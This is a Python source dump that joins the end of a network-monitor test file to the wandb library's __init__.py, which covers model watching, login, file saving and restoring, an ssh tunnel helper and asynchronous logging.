            return (False, ('bar', {}))

        def format_rabbit_message(self, item):
            return {}

        def start_vent_collector(self, endpoint_hash):
            return None

        def host_has_active_collectors(self, endpoint_hash):
            return False

    mock_monitor = MockMonitor()
    mock_monitor.uss = MockUss()
    mock_monitor.logger = MockLogger().logger

    t1 = Thread(target=thread1)
    t1.start()
    mock_monitor.process()
    t1.join()

    # Expected per-endpoint (state, next-state) after one process() run.
    # NOTE(review): only 'state'/'next-state' are asserted below; the
    # 'endpoint' payloads (including the '10.10.0.101' ip in the first
    # entry, which differs from the seeded '10.0.0.101') are never checked.
    answer = dict(
        {
            '4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': {
                'state': 'UNKNOWN',
                'next-state': 'MIRRORING',
                'endpoint': {
                    'ip-address': '10.10.0.101',
                    'mac': 'f8:b1:56:fe:f2:de',
                    'segment': 'prod',
                    'tenant': 'FOO',
                    'active': 1,
                    'name': None}},
            '4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': {
                'state': 'UNKNOWN',
                'next-state': 'MIRRORING',
                'endpoint': {
                    'ip-address': '10.0.0.101',
                    'mac': 'f8:b1:56:fe:f2:de',
                    'segment': 'prod',
                    'tenant': 'FOO',
                    'active': 1,
                    'name': None}},
            '4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': {
                'state': 'UNKNOWN',
                'next-state': 'MIRRORING',
                'endpoint': {
                    'ip-address': '10.0.0.101',
                    'mac': 'f8:b1:56:fe:f2:de',
                    'segment': 'prod',
                    'tenant': 'FOO',
                    'active': 0,
                    'name': None}},
            '4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': {
                'state': 'KNOWN',
                'next-state': 'NONE',
                'endpoint': {
                    'ip-address': '10.0.0.101',
                    'mac': 'f8:b1:56:fe:f2:de',
                    'segment': 'prod',
                    'tenant': 'FOO',
                    'active': 1,
                    'name': None}},
            '4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': {
                'state': 'KNOWN',
                'next-state': 'REINVESTIGATING',
                'endpoint': {
                    'ip-address': '10.0.0.101',
                    'mac': 'f8:b1:56:fe:f2:de',
                    'segment': 'prod',
                    'tenant': 'FOO',
                    'active': 1,
                    'name': None}},
            '4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': {
                'state': 'UNKNOWN',
                'next-state': 'MIRRORING',
                'endpoint': {
                    'ip-address': '10.0.0.101',
                    'mac': 'f8:b1:56:fe:f2:de',
                    'segment': 'prod',
                    'tenant': 'FOO',
                    'active': 1,
                    'name': None}},
            'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': {
                'state': 'KNOWN',
                'next-state': 'REINVESTIGATING',
                'endpoint': {
                    'ip-address': '10.0.0.99',
                    'mac': '20:4c:9e:5f:e3:c3',
                    'segment': 'to-core-router',
                    'tenant': 'EXTERNAL',
                    'active': 1,
                    'name': None}},
            'd60c5fa5c980b1cd791208eaf62aba9fb46d3aab': {
                'state': 'KNOWN',
                'next-state': 'NONE',
                'endpoint': {
                    'ip-address': '10.0.0.99',
                    'mac': '20:4c:9e:5f:e3:c3',
                    'segment': 'to-core-router',
                    'tenant': 'EXTERNAL',
                    'active': 1,
                    'name': None}},
            'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': {
                'state': 'KNOWN',
                'next-state': 'NONE',
                'endpoint': {
                    'ip-address': '10.0.0.99',
                    'mac': '20:4c:9e:5f:e3:c3',
                    'segment': 'to-core-router',
                    'tenant': 'EXTERNAL',
                    'active': 1,
                    'name': None}},
            'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': {
                'state': 'UNKNOWN',
                'next-state': 'MIRRORING',
                'endpoint': {
                    'ip-address': '10.0.0.99',
                    'mac': '20:4c:9e:5f:e3:c3',
                    'segment': 'to-core-router',
                    'tenant': 'EXTERNAL',
                    'active': 1,
                    'name': None}}
        })

    eps = mock_monitor.uss.endpoints
    for key in answer:
        assert answer[key]['state'] == eps.state[key].state
        assert answer[key]['next-state'] == eps.state[key].next_state

    # Second pass: swap in the failing queue getter and make sure process()
    # still runs to completion.
    mock_monitor.get_q_item = mock_monitor.bad_get_q_item
    t1 = Thread(target=thread1)
    t1.start()
    mock_monitor.process()
    t1.join()
def test_schedule_thread_worker():
    """schedule_thread_worker should loop on run_pending() until CTRL_C['STOP']
    flips, then call sys.exit (caught here as SystemExit)."""
    from threading import Thread
    import time

    def thread1():
        # Let the worker spin for ~5 seconds, then signal it to stop.
        global CTRL_C
        CTRL_C['STOP'] = False
        time.sleep(5)
        CTRL_C['STOP'] = True

    class MockLogger():
        def __init__(self):
            self.logger = Logger.logger
            self.poseidon_logger = Logger.poseidon_logger

    class MockSchedule():
        def __init__(self):
            pass

        def run_pending(self):
            pass

    # NOTE: the previous version bound a local `sys = mocksys()` stub here;
    # that binding was never used and could not affect the sys module that
    # schedule_thread_worker itself calls, so it has been removed.
    t1 = Thread(target=thread1)
    t1.start()
    try:
        # The worker exits via sys.exit(); swallow the resulting SystemExit.
        schedule_thread_worker(MockSchedule(), MockLogger().logger)
    except SystemExit:
        pass
    t1.join()
|
__init__.py | # -*- coding: utf-8 -*-
# Three possible modes:
# 'cli': running from "wandb" command
# 'run': we're a script launched by "wandb run"
# 'dryrun': we're a script not launched by "wandb run"
from __future__ import absolute_import, print_function
__author__ = """Chris Van Pelt"""
__email__ = 'vanpelt@wandb.com'
__version__ = '0.8.18'
import atexit
import click
import io
import json
import logging
import time
import os
import contextlib
import signal
import six
import getpass
import socket
import subprocess
import sys
import traceback
import tempfile
import re
import glob
import threading
import platform
import collections
from six.moves import queue
from six import string_types
from importlib import import_module
from . import env
from . import io_wrap
from .core import *
# These imports need to be below "from .core import *" until we remove
# 'from wandb import __stage_dir__' from api.py etc.
from wandb.apis import InternalApi, PublicApi, CommError
from wandb import wandb_types as types
from wandb import wandb_config
from wandb import wandb_run
from wandb import wandb_socket
from wandb import streaming_log
from wandb import util
from wandb.run_manager import LaunchError, Process
from wandb.data_types import Image
from wandb.data_types import Video
from wandb.data_types import Audio
from wandb.data_types import Table
from wandb.data_types import Html
from wandb.data_types import Object3D
from wandb.data_types import Histogram
from wandb.data_types import Graph
from wandb import trigger
from wandb.dataframes import image_categorizer_dataframe
from wandb.dataframes import image_segmentation_dataframe
from wandb.dataframes import image_segmentation_binary_dataframe
from wandb.dataframes import image_segmentation_multiclass_dataframe
from wandb import wandb_torch
from wandb.wandb_agent import agent
from wandb.wandb_controller import sweep, controller
from wandb.compat import windows
logger = logging.getLogger(__name__)

# Internal variables
# Seconds that shutdown_async_log_thread() waits for the async log queue to
# drain before warning that log statements may be dropped.
_shutdown_async_log_thread_wait_time = 20

# this global W&B debug log gets re-written by every W&B process
if __stage_dir__ is not None:
    GLOBAL_LOG_FNAME = os.path.abspath(os.path.join(wandb_dir(), 'debug.log'))
else:
    # No wandb directory configured yet; fall back to the system tmpdir.
    GLOBAL_LOG_FNAME = os.path.join(tempfile.gettempdir(), 'wandb-debug.log')
def _debugger(*args):
    """Drop into the pdb debugger; usable as a signal handler (args ignored)."""
    import pdb
    pdb.set_trace()
class Callbacks():
    """Deprecated shim exposing the Keras callback as wandb.callbacks.Keras."""
    @property
    def Keras(self):
        # Warn on every access; the supported import is wandb.keras.WandbCallback.
        termlog(
            "DEPRECATED: wandb.callbacks is deprecated, use `from wandb.keras import WandbCallback`")
        from wandb.keras import WandbCallback
        return WandbCallback


# Singleton kept for backward compatibility with old user code.
callbacks = Callbacks()
def hook_torch(*args, **kwargs):
    """Deprecated alias for :func:`watch`; warns and then delegates."""
    termlog(
        "DEPRECATED: wandb.hook_torch is deprecated, use `wandb.watch`")
    return watch(*args, **kwargs)
# Counts how many models have been watched so far in this process.
_global_watch_idx = 0


def watch(models, criterion=None, log="gradients", log_freq=100, idx=None):
    """
    Hooks into the torch model to collect gradients and the topology. Should be extended
    to accept arbitrary ML models.
    :param (torch.Module) models: The model to hook, can be a tuple
    :param (torch.F) criterion: An optional loss value being optimized
    :param (str) log: One of "gradients", "parameters", "all", or None
    :param (int) log_freq: log gradients and parameters every N batches
    :param (int) idx: an index to be used when calling wandb.watch on multiple models
    :return: (wandb.Graph) The graph object that will populate after the first backward pass
    """
    global _global_watch_idx
    if run is None:
        raise ValueError(
            "You must call `wandb.init` before calling watch")

    # Derive the two hook switches from the `log` mode. Gradients stay on for
    # any unrecognized value; they are only disabled by "parameters" or None.
    log_parameters = log in ("all", "parameters")
    log_gradients = log is not None and log != "parameters"

    if not isinstance(models, (tuple, list)):
        models = (models,)

    if idx is None:
        idx = _global_watch_idx

    graphs = []
    for offset, model in enumerate(models):
        graph_idx = idx + offset
        _global_watch_idx += 1
        # Disambiguate chart names when more than one model is watched.
        # TODO: this makes ugly chart names like gradients/graph_1conv1d.bias
        prefix = "graph_%i" % graph_idx if graph_idx > 0 else ''
        run.history.torch.add_log_hooks_to_pytorch_module(
            model, log_parameters=log_parameters, log_gradients=log_gradients,
            prefix=prefix, log_freq=log_freq)
        graphs.append(wandb_torch.TorchGraph.hook_torch(
            model, criterion, graph_idx=graph_idx))
    # NOTE: the graph is set in run.summary by hook_torch on the backward pass
    return graphs
def unwatch(models=None):
    """Remove pytorch gradient and parameter hooks.
    Args:
        models (list): Optional list of pytorch models that have had watch called on them
    """
    if not models:
        # No models given: tear down every registered hook.
        run.history.torch.unhook_all()
        return
    if not isinstance(models, (tuple, list)):
        models = (models,)
    for model in models:
        if hasattr(model, "_wandb_hook_names"):
            for name in model._wandb_hook_names:
                run.history.torch.unhook(name)
        else:
            termwarn("%s model has not been watched" % model)
class ExitHooks(object):
    """Intercepts sys.exit and uncaught exceptions so the exit status of the
    user process can be reported to the W&B monitor process."""

    def __init__(self):
        self.exit_code = 0
        self.exception = None

    def hook(self):
        """Install the interceptors, remembering the original sys.exit."""
        self._orig_exit = sys.exit
        sys.exit = self.exit
        sys.excepthook = self.exc_handler

    def exit(self, code=0):
        orig_code = code
        if isinstance(code, int):
            self.exit_code = code
        else:
            # Normalize: None means success; any other non-int (e.g. an
            # error-message string) counts as failure.
            self.exit_code = 0 if code is None else 1
        self._orig_exit(orig_code)

    def was_ctrl_c(self):
        return isinstance(self.exception, KeyboardInterrupt)

    def exc_handler(self, exc_type, exc, *tb):
        self.exit_code = 1
        self.exception = exc
        if issubclass(exc_type, Error):
            termerror(str(exc))
        if self.was_ctrl_c():
            # Conventional exit code for termination by ctrl-c.
            self.exit_code = 255
        traceback.print_exception(exc_type, exc, *tb)
def _init_headless(run, cloud=True):
    """Launch the background `wandb headless` child process, wire this
    process's stdout/stderr into it, and register shutdown handlers.
    Replaces the module-level join() with a closure bound to this run.
    Raises LaunchError if the child fails to come up within 30 seconds."""
    global join
    global _user_process_finished_called

    environ = dict(os.environ)
    run.set_environment(environ)

    # Socket used for readiness/again signaling with the child process.
    server = wandb_socket.Server()
    run.socket = server
    hooks = ExitHooks()
    hooks.hook()

    if platform.system() == "Windows":
        try:
            import win32api
            # Make sure we are not ignoring CTRL_C_EVENT
            # https://docs.microsoft.com/en-us/windows/console/setconsolectrlhandler
            # https://stackoverflow.com/questions/1364173/stopping-python-using-ctrlc
            win32api.SetConsoleCtrlHandler(None, False)
        except ImportError:
            termerror("Install the win32api library with `pip install pypiwin32`")

        # PTYs don't work in windows so we create these unused pipes and
        # mirror stdout to run.dir/output.log. There should be a way to make
        # pipes work, but I haven't figured it out. See links in compat/windows
        stdout_master_fd, stdout_slave_fd = os.pipe()
        stderr_master_fd, stderr_slave_fd = os.pipe()
    else:
        stdout_master_fd, stdout_slave_fd = io_wrap.wandb_pty(resize=False)
        stderr_master_fd, stderr_slave_fd = io_wrap.wandb_pty(resize=False)

    # Arguments handed to internal_cli.py so the child can adopt our FDs.
    headless_args = {
        'command': 'headless',
        'pid': os.getpid(),
        'stdout_master_fd': stdout_master_fd,
        'stderr_master_fd': stderr_master_fd,
        'cloud': cloud,
        'port': server.port
    }
    internal_cli_path = os.path.join(
        os.path.dirname(__file__), 'internal_cli.py')

    if six.PY2 or platform.system() == "Windows":
        # TODO(adrian): close_fds=False is bad for security. we set
        # it so we can pass the PTY FDs to the wandb process. We
        # should use subprocess32, which has pass_fds.
        popen_kwargs = {'close_fds': False}
    else:
        popen_kwargs = {'pass_fds': [stdout_master_fd, stderr_master_fd]}

    # TODO(adrian): ensure we use *exactly* the same python interpreter
    # TODO(adrian): make wandb the foreground process so we don't give
    # up terminal control until syncing is finished.
    # https://stackoverflow.com/questions/30476971/is-the-child-process-in-foreground-or-background-on-fork-in-c
    wandb_process = subprocess.Popen([sys.executable, internal_cli_path, json.dumps(
        headless_args)], env=environ, **popen_kwargs)
    termlog('Tracking run with wandb version {}'.format(
        __version__))
    # The child owns the master ends now; close our copies.
    os.close(stdout_master_fd)
    os.close(stderr_master_fd)

    # Listen on the socket waiting for the wandb process to be ready
    try:
        success, _ = server.listen(30)
    except KeyboardInterrupt:
        success = False
    else:
        if not success:
            termerror('W&B process (PID {}) did not respond'.format(
                wandb_process.pid))
    if not success:
        wandb_process.kill()
        # Give the child up to ~2s to die before reporting a kill failure.
        for _ in range(20):
            time.sleep(0.1)
            if wandb_process.poll() is not None:
                break
        if wandb_process.poll() is None:
            termerror('Failed to kill wandb process, PID {}'.format(
                wandb_process.pid))
        # TODO attempt to upload a debug log
        path = GLOBAL_LOG_FNAME.replace(os.getcwd()+os.sep, "")
        raise LaunchError(
            "W&B process failed to launch, see: {}".format(path))

    if platform.system() == "Windows":
        output = open(os.path.join(run.dir, "output.log"), "wb")
        stdout_redirector = io_wrap.WindowsRedirector(sys.stdout, output)
        stderr_redirector = io_wrap.WindowsRedirector(sys.stderr, output)
    else:
        stdout_slave = os.fdopen(stdout_slave_fd, 'wb')
        stderr_slave = os.fdopen(stderr_slave_fd, 'wb')
        try:
            stdout_redirector = io_wrap.FileRedirector(sys.stdout, stdout_slave)
            stderr_redirector = io_wrap.FileRedirector(sys.stderr, stderr_slave)
        except ValueError:
            # stdout / err aren't files
            output = open(os.path.join(run.dir, "output.log"), "wb")
            stdout_redirector = io_wrap.WindowsRedirector(sys.stdout, output)
            stderr_redirector = io_wrap.WindowsRedirector(sys.stderr, output)

    # TODO(adrian): we should register this right after starting the wandb process to
    # make sure we shut down the W&B process eg. if there's an exception in the code
    # above
    atexit.register(_user_process_finished, server, hooks,
                    wandb_process, stdout_redirector, stderr_redirector)

    def _wandb_join(exit_code=None):
        # Closure that replaces the module-level join(): finalizes this run
        # against the headless child started above.
        global _global_run_stack
        shutdown_async_log_thread()
        run.close_files()
        if exit_code is not None:
            hooks.exit_code = exit_code
        _user_process_finished(server, hooks,
                               wandb_process, stdout_redirector, stderr_redirector)
        if len(_global_run_stack) > 0:
            _global_run_stack.pop()
    join = _wandb_join
    _user_process_finished_called = False

    # redirect output last of all so we don't miss out on error messages
    stdout_redirector.redirect()
    if not env.is_debug():
        stderr_redirector.redirect()
def load_ipython_extension(ipython):
    """IPython extension entry point; W&B needs no extension-time setup."""
    return None
def login(anonymous=None, key=None):
    """Ensure this machine is logged in
    You can manually specify a key, but this method is intended to prompt for user input.
    anonymous can be "never", "must", or "allow". If set to "must" we'll always login anonymously,
    if set to "allow" we'll only create an anonymous user if the user isn't already logged in.
    Returns:
        True if login was successful
        False on failure
    """
    # This ensures we have a global api object
    ensure_configured()
    if anonymous:
        os.environ[env.ANONYMOUS] = anonymous
    anonymous = anonymous or "never"
    # Anything other than a plain python interpreter counts as jupyter here.
    in_jupyter = _get_python_type() != "python"
    if key:
        # An explicit key wins over everything else.
        termwarn("If you're specifying your api key in code, ensure this code is not shared publically.\nConsider setting the WANDB_API_KEY environment variable, or running `wandb login` from the command line.")
        if in_jupyter:
            termwarn("Calling wandb.login() without arguments from jupyter should prompt you for an api key.")
        util.set_api_key(api, key)
    elif api.api_key and anonymous != "must":
        # Already configured; reuse the stored key.
        key = api.api_key
    elif in_jupyter:
        os.environ[env.JUPYTER] = "true"
        # Don't return key to ensure it's not displayed in the notebook.
        key = _jupyter_login(api=api)
    else:
        key = util.prompt_api_key(api)
    return True if key else False
def _jupyter_login(force=True, api=None):
    """Attempt to login from a jupyter environment
    If force=False, we'll only attempt to auto-login, otherwise we'll prompt the user
    """
    def get_api_key_from_browser(signup=False):
        # Platform-specific key retrieval, falling back to anonymous keys
        # and finally to an interactive prompt when force=True.
        key, anonymous = None, False
        if 'google.colab' in sys.modules:
            # NOTE(review): `jupyter` is not imported at module scope in this
            # file; presumably it is available by the time this runs — verify.
            key = jupyter.attempt_colab_login(api.app_url)
        elif 'databricks_cli' in sys.modules and 'dbutils' in sys.modules:
            # Databricks does not seem to support getpass() so we need to fail
            # early and prompt the user to configure the key manually for now.
            termerror(
                "Databricks requires api_key to be configured manually, instructions at: http://docs.wandb.com/integrations/databricks")
            raise LaunchError("Databricks integration requires api_key to be configured.")
        # For jupyter we default to not allowing anonymous
        if not key and os.environ.get(env.ANONYMOUS, "never") != "never":
            key = api.create_anonymous_api_key()
            anonymous = True
        if not key and force:
            try:
                termerror("Not authenticated. Copy a key from https://app.wandb.ai/authorize")
                key = getpass.getpass("API Key: ").strip()
            except NotImplementedError:
                termerror(
                    "Can't accept input in this environment, you should set WANDB_API_KEY or call wandb.login(key='YOUR_API_KEY')")
        return key, anonymous

    api = api or (run.api if run else None)
    if not api:
        raise LaunchError("Internal error: api required for jupyter login")
    return util.prompt_api_key(api, browser_callback=get_api_key_from_browser)
def _init_jupyter(run):
    """Asks for user input to configure the machine if it isn't already and creates a new run.
    Log pushing and system stats don't start until `wandb.log()` is first called.
    """
    from wandb import jupyter
    from IPython.core.display import display, HTML
    # TODO: Should we log to jupyter?
    # global logging had to be disabled because it set the level to debug
    # I also disabled run logging because we're rairly using it.
    # try_to_set_up_global_logging()
    # run.enable_logging()
    os.environ[env.JUPYTER] = "true"

    if not run.api.api_key:
        # Fetches or prompts the users for an API key. Or if anonymode enabled, uses anonymous API key
        key = _jupyter_login()
        # Ensure our api client picks up the new key
        if key:
            run.api.reauth()
        else:
            # No key obtainable: degrade to offline (dryrun) mode.
            run.mode = "dryrun"
            display(HTML('''
<b>Could not authenticate.</b><br/>
'''))
    run.resume = "allow"
    if run.mode == "dryrun":
        # NOTE(review): this template contains no {} placeholder, so the
        # .format(run.api.app_url) call below is a no-op — confirm intent.
        display(HTML('''
Using <a href="https://wandb.com" target="_blank">Weights & Biases</a> in dryrun mode. Not logging results to the cloud.<br/>
Call wandb.login() to authenticate this machine.<br/>
'''.format(run.api.app_url)))
    else:
        displayed = False
        try:
            sweep_url = run.get_sweep_url()
            sweep_line = 'Sweep page: <a href="{}" target="_blank">{}</a><br/>\n'.format(
                sweep_url, sweep_url) if sweep_url else ""
            docs_html = '<a href="https://docs.wandb.com/integrations/jupyter.html" target="_blank">(Documentation)</a>'
            display(HTML('''
Logging results to <a href="https://wandb.com" target="_blank">Weights & Biases</a> {}.<br/>
Project page: <a href="{}" target="_blank">{}</a><br/>
{}Run page: <a href="{}" target="_blank">{}</a><br/>
'''.format(docs_html, run.get_project_url(), run.get_project_url(), sweep_line, run.get_url(), run.get_url() )))
            displayed = True
            run.save()
        except (CommError, ValueError) as e:
            if not displayed:
                display(HTML('''
Logging results to <a href="https://wandb.com" target="_blank">Weights & Biases</a>.<br/>
Couldn't load entity due to error: {}
'''.format(e.message)))
            else:
                termerror(str(e))
    run.set_environment()
    run._init_jupyter_agent()
    ipython = get_ipython()
    ipython.register_magics(jupyter.WandBMagics)

    def reset_start():
        """Reset START_TIME to when the cell starts"""
        global START_TIME
        START_TIME = time.time()
    ipython.events.register("pre_run_cell", reset_start)

    def cleanup():
        # shutdown async logger because _user_process_finished isn't called in jupyter
        shutdown_async_log_thread()
        run._stop_jupyter_agent()
    ipython.events.register('post_run_cell', cleanup)
# Guard so _user_process_finished only runs once even if both atexit and
# join() invoke it.
_user_process_finished_called = False


def _user_process_finished(server, hooks, wandb_process, stdout_redirector, stderr_redirector):
    """Restore output redirection, report the exit code to the W&B child
    process, and wait for it to finish syncing. Idempotent."""
    global _user_process_finished_called
    if _user_process_finished_called:
        return
    _user_process_finished_called = True
    trigger.call('on_finished')
    stdout_redirector.restore()
    if not env.is_debug():
        stderr_redirector.restore()
    termlog()
    termlog("Waiting for W&B process to finish, PID {}".format(wandb_process.pid))
    server.done(hooks.exit_code)
    try:
        while wandb_process.poll() is None:
            time.sleep(0.1)
    except KeyboardInterrupt:
        # First ctrl-c: keep waiting; a second ctrl-c kills the child outright.
        termlog('Sending ctrl-c to W&B process, PID {}. Press ctrl-c again to kill it.'.format(wandb_process.pid))
        try:
            while wandb_process.poll() is None:
                time.sleep(0.1)
        except KeyboardInterrupt:
            if wandb_process.poll() is None:
                termlog('Killing W&B process, PID {}'.format(wandb_process.pid))
                wandb_process.kill()
# Will be set to the run object for the current run, as returned by
# wandb.init(). We may want to get rid of this, but WandbCallback
# relies on it, and it improves the API a bit (user doesn't have to
# pass the run into WandbCallback). run is None instead of a PreInitObject
# as many places in the code check this.
run = None
config = util.PreInitObject("wandb.config")  # config object shared with the global run
summary = util.PreInitObject("wandb.summary")  # summary object shared with the global run
Api = PublicApi
# Stores what modules have been patched
patched = {
    "tensorboard": [],
    "keras": [],
    "gym": []
}
# (glob_str, base_path, policy) triples already registered via wandb.save().
_saved_files = set()
# Stack of active runs; supports successive wandb.init() calls.
_global_run_stack = []
def join(exit_code=None):
    """Marks a run as finished"""
    shutdown_async_log_thread()
    if run:
        run.close_files()
    if _global_run_stack:
        _global_run_stack.pop()
def save(glob_str, base_path=None, policy="live"):
    """ Ensure all files matching *glob_str* are synced to wandb with the policy specified.
    base_path: the base path to run the glob relative to
    policy:
        live: upload the file as it changes, overwriting the previous version
        end: only upload file when the run ends

    Returns the list of symlink paths created under run.dir, or [] when the
    glob was already registered or points at cloud storage.
    Raises ValueError before init, for an unknown policy, a non-string glob,
    or a glob that escapes base_path.
    """
    global _saved_files
    if run is None:
        raise ValueError(
            "You must call `wandb.init` before calling save")
    if policy not in ("live", "end"):
        raise ValueError(
            'Only "live" and "end" policies are currently supported.')
    if isinstance(glob_str, bytes):
        glob_str = glob_str.decode('utf-8')
    if not isinstance(glob_str, string_types):
        raise ValueError("Must call wandb.save(glob_str) with glob_str a str")

    if base_path is None:
        base_path = os.path.dirname(glob_str)
    wandb_glob_str = os.path.relpath(glob_str, base_path)
    if "../" in wandb_glob_str:
        raise ValueError(
            "globs can't walk above base_path")
    # Idempotent: each (glob, base, policy) triple is only registered once.
    if (glob_str, base_path, policy) in _saved_files:
        return []
    if glob_str.startswith("gs://") or glob_str.startswith("s3://"):
        termlog(
            "%s is a cloud storage url, can't save file to wandb." % glob_str)
        return []
    run.send_message(
        {"save_policy": {"glob": wandb_glob_str, "policy": policy}})
    files = []
    for path in glob.glob(glob_str):
        file_name = os.path.relpath(path, base_path)
        abs_path = os.path.abspath(path)
        wandb_path = os.path.join(run.dir, file_name)
        util.mkdir_exists_ok(os.path.dirname(wandb_path))
        # We overwrite existing symlinks because namespaces can change in Tensorboard
        if os.path.islink(wandb_path) and abs_path != os.readlink(wandb_path):
            os.remove(wandb_path)
            os.symlink(abs_path, wandb_path)
        elif not os.path.exists(wandb_path):
            os.symlink(abs_path, wandb_path)
        files.append(wandb_path)
    _saved_files.add((glob_str, base_path, policy))
    return files
def restore(name, run_path=None, replace=False, root=None):
    """ Downloads the specified file from cloud storage into the current run directory
    if it doesn't exist.
    name: the name of the file
    run_path: optional path to a different run to pull files from
    replace: whether to download the file even if it already exists locally
    root: the directory to download the file to. Defaults to the current
        directory or the run directory if wandb.init was called.
    returns None if it can't find the file, otherwise a file object open for reading
    raises wandb.CommError if it can't find the run
    """
    if run_path is None and run is None:
        raise ValueError(
            "You must call `wandb.init` before calling restore or specify a run_path")
    api = Api()
    api_run = api.run(run_path or run.path)
    # BUGFIX: parenthesized so that an explicit `root` is honored even when
    # there is no global run. The previous `root or run.dir if run else "."`
    # parsed as `(root or run.dir) if run else "."`, silently discarding a
    # caller-supplied root whenever run was None.
    root = root or (run.dir if run else ".")
    path = os.path.join(root, name)
    if os.path.exists(path) and not replace:
        # Local copy already present and caller didn't ask to re-download.
        return open(path, "r")
    files = api_run.files([name])
    if len(files) == 0:
        return None
    return files[0].download(root=root, replace=True)
# Handle of the currently-open ssh tunnel subprocess, if any.
_tunnel_process = None


def tunnel(host, port):
    """Simple helper to open a tunnel. Returns a public HTTPS url or None"""
    global _tunnel_process
    if _tunnel_process:
        # Only one tunnel at a time: tear down any previous one first.
        _tunnel_process.kill()
        _tunnel_process = None
    process = subprocess.Popen("ssh -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -R 80:{}:{} serveo.net".format(
        host, port), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    while process.returncode is None:
        # serveo prints the public URL on stdout; scan for it.
        for line in process.stdout:
            match = re.match(r".+(https.+)$", line.decode("utf-8").strip())
            if match:
                _tunnel_process = process
                return match.group(1)
        # set returncode if the process has exited
        process.poll()
        time.sleep(1)
    return None
def monitor(options=None):
    """Starts syncing with W&B if you're in Jupyter. Displays your W&B charts live in a Jupyter notebook.
    It's currently a context manager for legacy reasons.

    options: optional dict of display options (currently unused; kept for
        backward compatibility).
    """
    # BUGFIX: the previous signature used a mutable default (`options={}`),
    # which is shared across calls; use None and build a fresh dict instead.
    if options is None:
        options = {}
    try:
        from IPython.display import display
    except ImportError:
        def display(stuff): return None

    class Monitor():
        def __init__(self, options=None):
            if os.getenv(env.JUPYTER):
                # NOTE(review): `jupyter` is not imported at module scope in
                # this file; presumably it is in scope by the time this runs
                # (it is imported in _init_jupyter) — verify.
                display(jupyter.Run())
            else:
                self.rm = False
                termerror(
                    "wandb.monitor is only functional in Jupyter notebooks")

        def __enter__(self):
            termlog(
                "DEPRECATED: with wandb.monitor(): is deprecated, add %%wandb to the beginning of a cell to see live results.")

        def __exit__(self, *args):
            pass

    return Monitor(options)
# Plumbing for wandb.log(..., sync=False): a queue of pending log calls plus
# the events used to coordinate shutdown of the consumer thread.
_async_log_queue = queue.Queue()
_async_log_thread_shutdown_event = threading.Event()
_async_log_thread_complete_event = threading.Event()
_async_log_thread = None
def _async_log_thread_target():
    """Consumes async logs from our _async_log_queue and actually logs them"""
    global _async_log_thread
    shutdown_requested = False
    while not shutdown_requested:
        try:
            kwargs = _async_log_queue.get(block=True, timeout=1)
            log(**kwargs)
        except queue.Empty:
            # Only exit once shutdown has been signalled AND the queue has
            # drained; otherwise keep consuming pending log calls.
            shutdown_requested = _async_log_thread_shutdown_event.wait(1) and _async_log_queue.empty()
    # Signal shutdown_async_log_thread() that we are done, and allow a fresh
    # thread to be started later.
    _async_log_thread_complete_event.set()
    _async_log_thread = None
def _ensure_async_log_thread_started():
    """Ensures our log consuming thread is started"""
    global _async_log_thread, _async_log_thread_shutdown_event, _async_log_thread_complete_event
    if _async_log_thread is not None:
        return
    # Fresh events so a previously shut-down thread's state can't leak in.
    _async_log_thread_shutdown_event = threading.Event()
    _async_log_thread_complete_event = threading.Event()
    worker = threading.Thread(target=_async_log_thread_target)
    worker.daemon = True
    _async_log_thread = worker
    worker.start()
def shutdown_async_log_thread():
    """Shuts down our async logging thread"""
    if not _async_log_thread:
        return
    _async_log_thread_shutdown_event.set()
    drained = _async_log_thread_complete_event.wait(_shutdown_async_log_thread_wait_time)  # TODO: possible race here
    if drained is False:
        termwarn('async log queue not empty after %d seconds, some log statements will be dropped' % (
            _shutdown_async_log_thread_wait_time))
        # FIXME: it is worse than this, likely the program will crash because files will be closed
    # FIXME: py 2.7 will return None here so we dont know if we dropped data
def log(row=None, commit=True, step=None, sync=True, *args, **kwargs):
    """Log a dict to the global run's history.
    wandb.log({'train-loss': 0.5, 'accuracy': 0.9})
    Args:
        row (dict, optional): A dict of serializable python objects i.e str: ints, floats, Tensors, dicts, or wandb.data_types
        commit (boolean, optional): Persist a set of metrics, if false just update the existing dict
        step (integer, optional): The global step in processing. This sets commit=True any time step increases
        sync (boolean, True): If set to False, process calls to log in a seperate thread
    """
    current_run = run
    if current_run is None:
        raise ValueError(
            "You must call `wandb.init` in the same process before calling log")
    current_run.log(row, commit, step, sync, *args, **kwargs)
def ensure_configured():
    """(Re-)create the global API object and debug-log path.

    We re-initialize here so tests get a fresh API handle.
    """
    global GLOBAL_LOG_FNAME, api
    log_path = os.path.join(wandb_dir(), 'debug.log')
    GLOBAL_LOG_FNAME = os.path.abspath(log_path)
    api = InternalApi()
def uninit(only_patches=False):
    """Undo the effects of init(). Useful for testing.

    Args:
        only_patches (bool): If True, only undo module patches (tensorboard)
            and leave the global run/config/summary state untouched.
    """
    global run, config, summary, patched, _saved_files
    if not only_patches:
        # Reset the module-level singletons back to their pre-init placeholders.
        run = None
        config = util.PreInitObject("wandb.config")
        summary = util.PreInitObject("wandb.summary")
        _saved_files = set()
    # UNDO patches
    for mod in patched["tensorboard"]:
        # mod is a [module_name, attribute_path] pair recorded when patching.
        module = import_module(mod[0])
        parts = mod[1].split(".")
        if len(parts) > 1:
            # Dotted attribute like "x.y": descend into "x", then restore "y".
            module = getattr(module, parts[0])
            mod[1] = parts[1]  # NOTE: mutates the registry entry in place
        # The patcher stashed the original under an "orig_" prefix; put it back.
        setattr(module, mod[1], getattr(module, "orig_"+mod[1]))
    patched["tensorboard"] = []
def reset_env(exclude=None):
    """Remove WANDB_* environment variables, used in Jupyter notebooks.

    Args:
        exclude (iterable, optional): Variable names to keep untouched.

    Returns:
        bool: True if wandb had been initialized and variables were cleared,
        False otherwise.
    """
    # BUG FIX: the original used a mutable default argument (exclude=[]),
    # which is shared across calls; use None and normalize to a set for
    # O(1) membership tests.
    exclude = set(exclude) if exclude is not None else set()
    if os.getenv(env.INITED):
        wandb_keys = [key for key in os.environ.keys() if key.startswith(
